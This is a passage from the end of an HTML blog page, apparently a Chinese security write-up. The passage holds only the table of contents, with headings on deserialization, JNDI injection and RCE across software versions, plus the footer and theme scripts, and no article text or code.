href="#4-7-8%EF%BC%88%E6%9C%80%E6%96%B0%E7%89%88%EF%BC%89"><span class="nav-text">4.7.8（最新版）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-text">总结</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%82%E8%80%83"><span class="nav-text">参考</span></a></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="border-box website-info-box shields">
        
            <div class="info-item">
                
                <a class="shields-item">
                    <img src="https://img.shields.io/badge/Since-2023_--_2024-dodgerblue?style=flat-square">
                </a>
                
                    <a class="shields-item" href="/blog/">
                        <img src="https://img.shields.io/badge/WebMaster-Yu9-dodgerblue?style=flat-square">
                    </a>
                
                
                <a class="shields-item" href="https://hexo.io" target="_blank">
                    <img src="https://img.shields.io/badge/Powered_by-Hexo-dodgerblue?style=flat-square">
                </a>
                <a class="shields-item" href="https://github.com/XPoet/hexo-theme-keep" target="_blank">
                    <img class="shields-keep-version" src="https://img.shields.io/badge/Theme-Keep-dodgerblue?style=flat-square">
                </a>
                
            </div>
            
                <div class="info-item">
                    
                        
                    
                </div>
            
        

        <div class="count-item info-item shields">
            
                <span class="count-box border-box word">
                    <span class="item-type border-box">总字数</span>
                    <span class="item-value border-box word">40.7k</span>
                </span>
            

            
                <span class="count-box border-box uv">
                    <span class="item-type border-box">访客数</span>
                    <span class="item-value border-box uv" id="busuanzi_value_site_uv"></span>
                </span>
            

            
                <span class="count-box border-box pv">
                    <span class="item-type border-box">访问量</span>
                    <span class="item-value border-box pv" id="busuanzi_value_site_pv"></span>
                </span>
            
        </div>
    </div>
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="tools-list border-box">
        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-toggle-theme-mode flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E5%AE%9E%E7%8E%B0%E5%8E%9F%E7%90%86"><span class="nav-text">计划任务实现原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E6%88%90%E5%9B%A0"><span class="nav-text">漏洞成因</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-6-2"><span class="nav-text">4.6.2</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#SnakeYAML%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="nav-text">SnakeYAML反序列化</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#JNDI%E6%B3%A8%E5%85%A5"><span class="nav-text">JNDI注入</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-6-2-1"><span class="nav-text">&lt; 4.6.2</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#rmi"><span class="nav-text">rmi</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-text">&lt;4.7.0</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8D%95%E5%BC%95%E5%8F%B7%E7%BB%95%E8%BF%87"><span class="nav-text">单引号绕过</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#-1"><span class="nav-text">&lt;4.7.2</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#ldaps"><span class="nav-text">ldaps</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6rce"><span class="nav-text">配置文件rce</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-7-3"><span class="nav-text">4.7.3</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-7-8%EF%BC%88%E6%9C%80%E6%96%B0%E7%89%88%EF%BC%89"><span class="nav-text">4.7.8（最新版）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-text">总结</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%82%E8%80%83"><span class="nav-text">参考</span></a></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>



<!-- common -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.0/js/utils.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.0/js/header-shrink.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.0/js/back2top.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.0/js/toggle-theme.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.0/js/code-block.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.0/js/main.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.0/js/libs/anime.min.js"></script>

<!-- local-search -->

    <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.0/js/local-search.min.js"></script>


<!-- lazyload -->


<div class="pjax">
    
        <!-- post-helper -->
        <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.0/js/post/post-helper.min.js"></script>

        <!-- toc -->
        
            <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.0/js/post/toc.min.js"></script>
        

        <!-- copyright-info -->
        

        <!-- share -->
        
            <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.0/js/post/share.min.js"></script>
        
    

    <!-- categories page -->
    

    <!-- links page -->
    

    <!-- photos page -->
    

    <!-- tools page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->

    <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.0/js/libs/pjax.min.js"></script>
<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
        });

        document.addEventListener('pjax:send', () => {
            KEEP.utils.pjaxProgressBarStart()
        });

        document.addEventListener('pjax:complete', () => {
            KEEP.utils.pjaxProgressBarEnd()
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'))
            KEEP.initExecute()
        });
    });
</script>




    

</body>
</html>
